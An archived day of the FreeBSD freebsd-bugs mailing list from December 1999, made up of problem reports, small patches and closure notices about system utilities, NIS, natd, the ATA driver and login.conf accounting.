23:31:11 PST 1999 Responsible-Changed-Why: I'm handling this. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 3:23:26 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from Alborz.sbu.ac.ir (alborz.sbu.ac.ir [194.225.24.35]) by hub.freebsd.org (Postfix) with ESMTP id 2C94B151A8; Wed, 15 Dec 1999 03:23:04 -0800 (PST) (envelope-from admin@Alborz.sbu.ac.ir) Received: from localhost (admin@localhost) by Alborz.sbu.ac.ir (8.9.2/8.9.2) with ESMTP id OAA92207; Wed, 15 Dec 1999 14:56:56 +0330 (IRT) (envelope-from admin@Alborz.sbu.ac.ir) Date: Wed, 15 Dec 1999 14:56:56 +0330 (IRT) From: Hossein Mobahi To: freebsd-admin@freebsd.org Cc: freebsd-bugs@freebsd.org, freebsd-questions@freebsd.org Subject: Accounting feature of login.conf is forgotten to be invoked ? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear friends . I run FreeBSD 3.1 . We know that login.conf has some features like authentication and accounting. and certain programs who are responsible for that feature , will read login.conf.db and look for the features that they are supposed to handle ( They do this search in login.conf.db by login.cap* functions ) Authentiction features are invoked by login and work perfectly . But no program is responsible for accounting features of login.conf ! I got it because in documents of login.conf is written "to enable accounting you should set boolean variable "accounted" " .. So if we say a program will be responsible for accounting section , it will use a login_cap* function with a paramter "accounted" .. Naturally its executable binary must contain this string too . So I typed "grep -R accounted /*" and got no useful result . Now my question is : Is accounting feature of login.conf forgotten ? What should I do ? I really need the options of login.conf accounting part like limiting users time per day , or limiting number of sessions that they can have simultaneously .. I am an admin and asked to set it up and I am in the strip between live and death ;-) Thanks for your answers in advance !!! P.S I am not subscribed to any of these mailing lists , so if you are gonna reply , please also send a copy to me : admin@alborz.sbu.ac.ir Regards ======================================================================= | Hossein Mobahi | | | | Server room , 2nd floor , Computer Center | | Shahid Beheshti University , Velenjak , Tehran , IRAN | | TEL : (+98 21) 240 0417 | | | | Web Site : http://www.sbu.ac.ir | ======================================================================= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 6:42:57 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D435F153C9; Wed, 15 Dec 1999 06:42:49 -0800 (PST) (envelope-from nbm@FreeBSD.org) Received: (from nbm@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA64839; Wed, 15 Dec 1999 06:42:49 -0800 (PST) (envelope-from nbm@FreeBSD.org) Date: Wed, 15 Dec 1999 06:42:49 -0800 (PST) From: Message-Id: <199912151442.GAA64839@freefall.freebsd.org> To: mike@sentex.net, nbm@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/14828: Current version of BIND in src/contrib is vulnerable to serveral DOS attacks Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Current version of BIND in src/contrib is vulnerable to serveral DOS attacks State-Changed-From-To: open->closed State-Changed-By: nbm State-Changed-When: Wed Dec 15 06:38:21 PST 1999 State-Changed-Why: peter upgraded and MFC'd bind 8.2.2p5 into src/contrib, and the port was updated by jseger. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 6:53:21 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 17B17154A7 for ; Wed, 15 Dec 1999 06:53:17 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA65731; Wed, 15 Dec 1999 06:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from kot.ne.mediaone.net (kot.ne.mediaone.net [24.218.15.190]) by hub.freebsd.org (Postfix) with ESMTP id C457515498 for ; Wed, 15 Dec 1999 06:49:51 -0800 (PST) (envelope-from mi@kot.ne.mediaone.net) Received: from rtfm.newton (rtfm.newton [10.10.0.1]) by kot.ne.mediaone.net (8.9.3/8.9.1) with ESMTP id JAA62396 for ; Wed, 15 Dec 1999 09:46:04 -0500 (EST) Received: (from mi@localhost) by rtfm.newton (8.9.3/8.9.3) id JAA32322; Wed, 15 Dec 1999 09:46:04 -0500 (EST) (envelope-from mi@kot.ne.mediaone.net) Message-Id: <199912151446.JAA32322@rtfm.newton> Date: Wed, 15 Dec 1999 09:46:04 -0500 (EST) From: Mikhail Teterin Reply-To: mi@kot.ne.mediaone.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15494: over-natd connections hang if MTUs are different Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15494 >Category: kern >Synopsis: over-natd connections hang if MTUs are different >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 06:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Mikhail Teterin >Release: FreeBSD 3.3-STABLE i386 >Organization: Virtual Estates, Inc. >Environment: A gateway machine with two interfaces -- public and private running natd. A client machine with one interface. The problem observed with the FreeBSD-3.3 (x86) client and with the Linux Redhat-6.0 client (on Alpha). >Description: The MTUs on the gateway's interfaces are set to 900 (seems to work better with this ancient 3Com ISA cards). The client's MTU was set to 1500. Any TCP connection made by the client (handled by the gateway's natd) would soon hang in the middle of data transfer. >How-To-Repeat: See description >Fix: Use the same MTU on the client. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 7:50:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2A331154EB for ; Wed, 15 Dec 1999 07:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA72247; Wed, 15 Dec 1999 07:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from gallions-reach.inpharmatica.co.uk (gallions-reach.inpharmatica.co.uk [193.115.214.5]) by hub.freebsd.org (Postfix) with ESMTP id 8805D1539C for ; Wed, 15 Dec 1999 07:48:20 -0800 (PST) (envelope-from m.seaman@inpharmatica.co.uk) Received: from kings-cross.inpharmatica.co.uk (euston.inpharmatica.co.uk [193.115.214.6]) by gallions-reach.inpharmatica.co.uk (8.8.8/8.8.8) with ESMTP id PAA12442 for ; Wed, 15 Dec 1999 15:48:19 GMT (envelope-from m.seaman@inpharmatica.co.uk) Received: from b0.farm.inpharmatica.co.uk (root@b0.farm.inpharmatica.co.uk [192.168.121.110]) by kings-cross.inpharmatica.co.uk (8.9.3/8.9.3) with ESMTP id PAA22965 for ; Wed, 15 Dec 1999 15:48:19 GMT Received: (from matthew@localhost) by b0.farm.inpharmatica.co.uk (8.9.3/8.9.3) id PAA64079; Wed, 15 Dec 1999 15:48:18 GMT (envelope-from matthew@mailhost.inpharmatica.co.uk) Message-Id: <199912151548.PAA64079@b0.farm.inpharmatica.co.uk> Date: Wed, 15 Dec 1999 15:48:18 GMT From: m.seaman@inpharmatica.co.uk Reply-To: m.seaman@inpharmatica.co.uk To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15496: killall(1) limited to 16 character process names by procfs(5) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15496 >Category: bin >Synopsis: killall(1) limited to 16 character process names by procfs(5) >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 07:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Matthew Seaman >Release: FreeBSD 3.4-RC alpha >Organization: Inpharmatica Ltd >Environment: FreeBSD 3.4-RC b0:/tmp:% uname -a FreeBSD b0.farm.inpharmatica.co.uk 3.4-RC FreeBSD 3.4-RC #0: Tue Dec 14 13:02:41 GMT 1999 root@b0.farm.inpharmatica.co.uk:/usr/src/sys/compile/FARM alpha >Description: killall(1) reads procfs /proc/${pid}/status entries to find the process names the user wants to kill. However, only the first 16 (MAXCOMLEN from /usr/include/sys/param.h) characters of the process name are available. Trying naively to killall(1) a process with a longer name is guarranteed to fail: instead the supplied name should be truncated to the first 16 characters. I'm not convinced that modifying procfs() to fix this somewhat obscure case is really going to be worthwhile. This should certainly be documented though. >How-To-Repeat: b0:/tmp:% cat foo.c #include int main (int argc, char *argv[]) { sleep(600); } b0:/tmp:% cc -o 1234567890123 foo.c b0:/tmp:% cp 1234567890123{,4} b0:/tmp:% cp 1234567890123{,45} b0:/tmp:% cp 1234567890123{,456} b0:/tmp:% cp 1234567890123{,4567} b0:/tmp:% ./12345678901234 & [4] 63828 b0:/tmp:% ./12345678901235 & [5] 63829 b0:/tmp:% ./123456789012345 & [6] 63830 b0:/tmp:% ./1234567890123456 & [7] 63831 b0:/tmp:% ./12345678901234567 & [8] 63832 b0:/tmp:% head /proc/{63826,63828,63830,63831,63832}/status ==> /proc/63826/status <== 1234567890123 63826 63513 63826 63513 5,2 ctty 945270683,3518 0,1030 0,6184 nanslp 1000 1000 1000,1000,1000,0,999,1018,994,993,997 ==> /proc/63828/status <== 12345678901234 63828 63513 63828 63513 5,2 ctty 945270704,936540 0,909 0,6369 nanslp 1000 1000 1000,1000,1000,0,999,1018,994,993,997 ==> /proc/63830/status <== 123456789012345 63830 63513 63830 63513 5,2 ctty 945270715,716412 0,3262 0,4349 nanslp 1000 1000 1000,1000,1000,0,999,1018,994,993,997 ==> /proc/63831/status <== 1234567890123456 63831 63513 63831 63513 5,2 ctty 945270719,857664 0,1879 0,5639 nanslp 1000 1000 1000,1000,1000,0,999,1018,994,993,997 ==> /proc/63832/status <== 1234567890123456 63832 63513 63832 63513 5,2 ctty 945270723,443053 0,2114 0,5287 nanslp 1000 1000 1000,1000,1000,0,999,1018,994,993,997 b0:/tmp:% killall 12345678901234567 No processes matching ``12345678901234567'' >Fix: --- killall.1 Tue Aug 31 10:08:27 1999 +++ /tmp/killall.1 Wed Dec 15 15:16:38 1999 @@ -52,6 +52,10 @@ .Nm that match the name .Ar procname . +Only the first 16 characters of the process name are available from +.Xr procfs 5 +for comparison: process names specified on the command line must be +truncated to this limit in order to match successfully. The super-user is allowed to kill any process. .Pp The options are as follows: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 8:37:40 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from pc015.fisica.ufc.br (pc015.fisica.ufc.br [200.17.35.40]) by hub.freebsd.org (Postfix) with ESMTP id 52E5A1528F for ; Wed, 15 Dec 1999 08:37:25 -0800 (PST) (envelope-from renan@fisica.ufc.br) Received: from fisica.ufc.br (localhost [127.0.0.1]) by pc015.fisica.ufc.br (8.9.3/8.9.1) with ESMTP id OAA01211 for ; Wed, 15 Dec 1999 14:42:25 -0300 (EST) (envelope-from renan@fisica.ufc.br) Message-ID: <3857D2FC.3B08EE3F@fisica.ufc.br> Date: Wed, 15 Dec 1999 14:42:21 -0300 From: Ricardo Renan X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 3.3-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.ORG Subject: KDE BUG Content-Type: multipart/alternative; boundary="------------EB0B39EAF6921D9003B185C5" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------EB0B39EAF6921D9003B185C5 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit My system (3.3) hang when i try to write in a write protected floppy 1.44 disk with kfm . I tested with kde 1.1.1 and 1.1.2 in other pcs running freebsd ( in my home and in my work), and the same problem occur. I have tested in linux and OpenBSD too, but there was no problem. -- Prof. Ricardo Renan Landim Universidade Federal do Ceara Departamento de Fisica Caixa Postal 6030 60455-760 Fortaleza - Ceara --------------EB0B39EAF6921D9003B185C5 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit My system  (3.3) hang when i try to write  in a write protected  floppy 1.44 disk  with kfm .  I tested with kde 1.1.1 and 1.1.2 in other pcs running freebsd ( in my home and in my work), and the same problem occur. I have tested in linux  and OpenBSD  too, but there was no problem.
-- 
Prof. Ricardo Renan Landim 
Universidade Federal do Ceara 
Departamento de Fisica 
Caixa Postal 6030 
60455-760 Fortaleza - Ceara
  --------------EB0B39EAF6921D9003B185C5-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 8:40: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 36BE5153C9 for ; Wed, 15 Dec 1999 08:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA76978; Wed, 15 Dec 1999 08:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from roma.coe.ufrj.br (roma.coe.ufrj.br [146.164.53.65]) by hub.freebsd.org (Postfix) with ESMTP id 1C06015241 for ; Wed, 15 Dec 1999 08:39:56 -0800 (PST) (envelope-from jonny@jonny.eng.br) Received: (from root@localhost) by roma.coe.ufrj.br (8.9.3/8.9.3) id OAA04736; Wed, 15 Dec 1999 14:39:53 -0200 (EDT) (envelope-from jonny) Message-Id: <199912151639.OAA04736@roma.coe.ufrj.br> Date: Wed, 15 Dec 1999 14:39:53 -0200 (EDT) From: Joao Carlos Mendes Luis Reply-To: jonny@jonny.eng.br To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15497: NIS and comments in /etc/passwd, /etc/group Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15497 >Category: bin >Synopsis: NIS does not deal well with comments >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 08:40:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Joao Carlos Mendes Luis >Release: FreeBSD 3.4-RC i386 >Organization: COPPE/UFRJ >Environment: FreeBSD NIS server, using /etc/group and /etc/master.passwd as source >Description: If you use comments (#) in those files, NIS tries to create tables with them, instead of ignoring them. >How-To-Repeat: Put a # comment in /etc/group, cd /var/yp, make >Fix: This patch removes lines with comments before making NIS databases. --- Makefile.antes Wed Dec 15 14:15:41 1999 +++ Makefile Wed Dec 15 14:37:56 1999 @@ -479,7 +479,7 @@ passwd.byname: $(PASSWD) @echo "Updating $@..." $(CAT) $(PASSWD) | \ - $(AWK) -F: '{ if ($$1 != "+") print $$1"\t"$$0 }' $^ \ + $(AWK) -F: '{ if ($$1 != "+" && $$1 !~ "^#.*") print $$1"\t"$$0 }' $^ \ | $(DBLOAD) -f -i $(PASSWD) -o $(YPMAPDIR)/$@ - $(TMP); \ $(RMV) $(TMP) $@ @$(DBLOAD) -c @@ -490,7 +490,7 @@ passwd.byuid: $(PASSWD) @echo "Updating $@..." $(CAT) $(PASSWD) | \ - $(AWK) -F: '{ if ($$1 != "+") print $$3"\t"$$0 }' $^ \ + $(AWK) -F: '{ if ($$1 != "+" && $$1 !~ "^#.*") print $$3"\t"$$0 }' $^ \ | $(DBLOAD) -f -i $(PASSWD) -o $(YPMAPDIR)/$@ - $(TMP); \ $(RMV) $(TMP) $@ @$(DBLOAD) -c @@ -502,7 +502,7 @@ group.byname: $(GROUP) @echo "Updating $@..." $(CAT) $(GROUP) | \ - $(AWK) -F: '{ if ($$1 != "+") print $$1"\t"$$0 }' $^ \ + $(AWK) -F: '{ if ($$1 != "+" && $$1 !~ "^#.*") print $$1"\t"$$0 }' $^ \ | $(DBLOAD) -f -i $(GROUP) -o $(YPMAPDIR)/$@ - $(TMP); \ $(RMV) $(TMP) $@ @$(DBLOAD) -c @@ -513,7 +513,7 @@ group.bygid: $(GROUP) @echo "Updating $@..." $(CAT) $(GROUP) | \ - $(AWK) -F: '{ if ($$1 != "+") print $$3"\t"$$0 }' $^ \ + $(AWK) -F: '{ if ($$1 != "+" && $$1 !~ "^#.*") print $$3"\t"$$0 }' $^ \ | $(DBLOAD) -f -i $(GROUP) -o $(YPMAPDIR)/$@ - $(TMP); \ $(RMV) $(TMP) $@ @$(DBLOAD) -c @@ -538,7 +538,7 @@ @echo "Master.passwd source file not found -- skipping" .else $(CAT) $(MASTER) | \ - $(AWK) -F: '{ if ($$1 != "+") print $$1"\t"$$0 }' $^ \ + $(AWK) -F: '{ if ($$1 != "+" && $$1 !~ "^#.*") print $$1"\t"$$0 }' $^ \ | $(DBLOAD) ${S} -f -i $(MASTER) -o $(YPMAPDIR)/$@ - $(TMP); \ $(RMV) $(TMP) $@ @$(DBLOAD) -c @@ -553,7 +553,7 @@ @echo "Master.passwd source file not found -- skipping" .else $(CAT) $(MASTER) | \ - $(AWK) -F: '{ if ($$1 != "+") print $$3"\t"$$0 }' $^ \ + $(AWK) -F: '{ if ($$1 != "+" && $$1 !~ "^#.*") print $$3"\t"$$0 }' $^ \ | $(DBLOAD) ${S} -f -i $(MASTER) -o $(YPMAPDIR)/$@ - $(TMP); \ $(RMV) $(TMP) $@ @$(DBLOAD) -c >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 15: 5:32 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5A78114CED; Wed, 15 Dec 1999 15:05:31 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA47186; Wed, 15 Dec 1999 15:05:31 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Wed, 15 Dec 1999 15:05:31 -0800 (PST) From: Message-Id: <199912152305.PAA47186@freefall.freebsd.org> To: jedgar@fxp.org, cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/12912: [PATCH] lpd leaves lock file permissions afoul Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] lpd leaves lock file permissions afoul State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Wed Dec 15 15:04:20 PST 1999 State-Changed-Why: Originator reports that the problem can't be reproduced on 3.3/4.0 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 15:20: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 882C515257 for ; Wed, 15 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA53938; Wed, 15 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from hawk.internal.chc-chimes.com (pixnat.chc-chimes.com [216.28.46.20]) by hub.freebsd.org (Postfix) with ESMTP id D8AE015438 for ; Wed, 15 Dec 1999 15:17:15 -0800 (PST) (envelope-from billf@hawk.internal.chc-chimes.com) Received: (from billf@localhost) by hawk.internal.chc-chimes.com (8.9.3/8.9.3) id SAA09952; Wed, 15 Dec 1999 18:17:14 -0500 (EST) (envelope-from billf) Message-Id: <199912152317.SAA09952@hawk.internal.chc-chimes.com> Date: Wed, 15 Dec 1999 18:17:14 -0500 (EST) From: billf@freebsd.org Reply-To: billf@chc-chimes.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15510: df(1) does not lineup with large filesystems Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15510 >Category: bin >Synopsis: df(1) does not lineup with large filesystems >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 15:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Bill Fumerola >Release: FreeBSD 4.0-CURRENT i386 >Organization: Computer Horizons Corp >Environment: FreeBSD doc001.level3.chc-chimes.com 4.0-CURRENT FreeBSD 4.0-CURRENT #8: Wed Dec 15 20:06:14 GMT 1999 billf@doc001.level3.chc-chimes.com:/usr/src/sys/compile/MISTERT i386 >Description: Large filesystems will screw up the output of df(1). >How-To-Repeat: root(doc001)--# df / /powervault1 Filesystem 1K-blocks Used Avail Capacity Mounted on /dev/da0s1a 198399 30931 151597 17% / /dev/amrd0e 240925081 1 221651074 0% /powervault1 >Fix: Either fix the whitespace in df or have smaller sized filesystems. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 17:10: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 940341544D for ; Wed, 15 Dec 1999 17:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA73739; Wed, 15 Dec 1999 17:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from blaubaer.kn-bremen.de (blaubaer.kn-bremen.de [195.37.179.254]) by hub.freebsd.org (Postfix) with ESMTP id 6C0E214BF3 for ; Wed, 15 Dec 1999 17:07:45 -0800 (PST) (envelope-from nox@saturn.kn-bremen.de) Received: from saturn.kn-bremen.de (uucp@localhost) by blaubaer.kn-bremen.de (8.9.1/8.9.1) with UUCP id CAA20564 for FreeBSD-gnats-submit@freebsd.org; Thu, 16 Dec 1999 02:04:56 +0100 Received: (from nox@localhost) by saturn.kn-bremen.de (8.9.3/8.8.5) id AAA10065; Thu, 16 Dec 1999 00:54:09 +0100 (CET) Message-Id: <199912152354.AAA10065@saturn.kn-bremen.de> Date: Thu, 16 Dec 1999 00:54:09 +0100 (CET) From: Juergen Lock Reply-To: nox@jelal.kn-bremen.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15511: Cannot scroll up after panic? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15511 >Category: kern >Synopsis: Cannot scroll up after panic? >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 17:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Juergen Lock >Release: FreeBSD 3.3-STABLE i386 >Organization: me? organized? >Environment: 3.3-STABLE i386 (actually that box has 3.4-RC), and an unstable nic driver... And no it was not the Cascade one :) >Description: (Not sure this is really a `sw-bug' but it sure can be annoying.) When i get a panic the console says something like `Rebooting in 15 seconds, hit a key to abort', and i hit a key. Then it says `Hit a key to reboot'. I want to read all that happened so i hit scroll lock (and the LED does come on), then page up. But guess what it does? It reboots... (Fortunately in this case i had already enabled crashdumps and all the needed information was in there.) >How-To-Repeat: Well, panic a box and then try to scroll up... >Fix: ?? >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 17:40: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6E52015694 for ; Wed, 15 Dec 1999 17:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA78524; Wed, 15 Dec 1999 17:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from nhj.nlc.net.au (nhj.nlc.net.au [203.24.133.1]) by hub.freebsd.org (Postfix) with SMTP id 0F5341568B for ; Wed, 15 Dec 1999 17:37:23 -0800 (PST) (envelope-from john@pacer.nlc.net.au) Received: (qmail 19971 invoked from network); 16 Dec 1999 12:37:14 +1100 Received: from pacer.nlc.net.au (203.24.133.16) by nhj.nlc.net.au with SMTP; 16 Dec 1999 12:37:14 +1100 Received: (qmail 1271 invoked by uid 1000); 16 Dec 1999 01:37:11 -0000 Message-Id: <19991216013711.1270.qmail@pacer.nlc.net.au> Date: 16 Dec 1999 01:37:11 -0000 From: john@nlc.net.au Reply-To: john@nlc.net.au To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15512: ATA driver bug for CD drives that don't report speed Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15512 >Category: kern >Synopsis: ATA driver bug for CD drives that don't report speed >Confidential: no >Severity: non-critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 17:40:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: John Saunders >Release: FreeBSD 4.0-CURRENT i386 >Organization: NORTHLINK COMMUNICATIONS >Environment: ATA driver, which is now the default, and a CD or DVD drive that returns 0 for it's speed. >Description: The ATA driver doesn't correctly print the device name in the boot messages. It prints a line starting with a comma followed by some other information. The standard boot messages all print the device name first on each line so that it is clear to which device the message belongs. >How-To-Repeat: Boot -CURRENT with a CD-ROM device that doesn't report its speed. >Fix: Apply the following patch... --- atapi-cd.c.orig Tue Dec 14 21:25:26 1999 +++ atapi-cd.c Thu Dec 16 11:27:23 1999 @@ -260,9 +260,10 @@ cdp->atp->controller->lun, (cdp->atp->unit == ATA_MASTER) ? "master" : "slave "); + printf("acd%d:", cdp->lun); + comma = 0; if (cdp->cap.cur_read_speed) { - printf("acd%d: ", cdp->lun); - printf("read %dKB/s", cdp->cap.cur_read_speed * 1000 / 1024); + printf(" read %dKB/s", cdp->cap.cur_read_speed * 1000 / 1024); if (cdp->cap.max_read_speed) printf(" (%dKB/s)", cdp->cap.max_read_speed * 1000 / 1024); if ((cdp->cap.cur_write_speed) && @@ -272,11 +273,13 @@ if (cdp->cap.max_write_speed) printf(" (%dKB/s)", cdp->cap.max_write_speed * 1000 / 1024); } + comma = 1; } - if (cdp->cap.buf_size) - printf(", %dKB buffer", cdp->cap.buf_size); - printf(", %s\n", ata_mode2str(cdp->atp->controller->mode[ - (cdp->atp->unit == ATA_MASTER) ? 0 : 1])); + if (cdp->cap.buf_size) { + printf("%s %dKB buffer", comma ? "," : "", cdp->cap.buf_size); comma = 1; + } + printf("%s %s\n", comma ? "," : "", ata_mode2str(cdp->atp->controller->mode[ + (cdp->atp->unit == ATA_MASTER) ? 0 : 1])); comma = 1; printf("acd%d: supported read types:", cdp->lun); comma = 0; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 17:53:51 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 405D815750; Wed, 15 Dec 1999 17:53:50 -0800 (PST) (envelope-from billf@FreeBSD.org) Received: (from billf@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA79927; Wed, 15 Dec 1999 17:53:50 -0800 (PST) (envelope-from billf@FreeBSD.org) Date: Wed, 15 Dec 1999 17:53:50 -0800 (PST) From: Message-Id: <199912160153.RAA79927@freefall.freebsd.org> To: vak@crox.net.kiae.su, billf@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/11023: Synchronous PPP not functional in leased line mode Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Synchronous PPP not functional in leased line mode State-Changed-From-To: open->closed State-Changed-By: billf State-Changed-When: Wed Dec 15 17:52:25 PST 1999 State-Changed-Why: See kern/11238, the patches contained in this PR were resubmitted as patches relative to -CURRENT per phk's request. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Dec 15 17:56:22 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CA7881568E; Wed, 15 Dec 1999 17:56:21 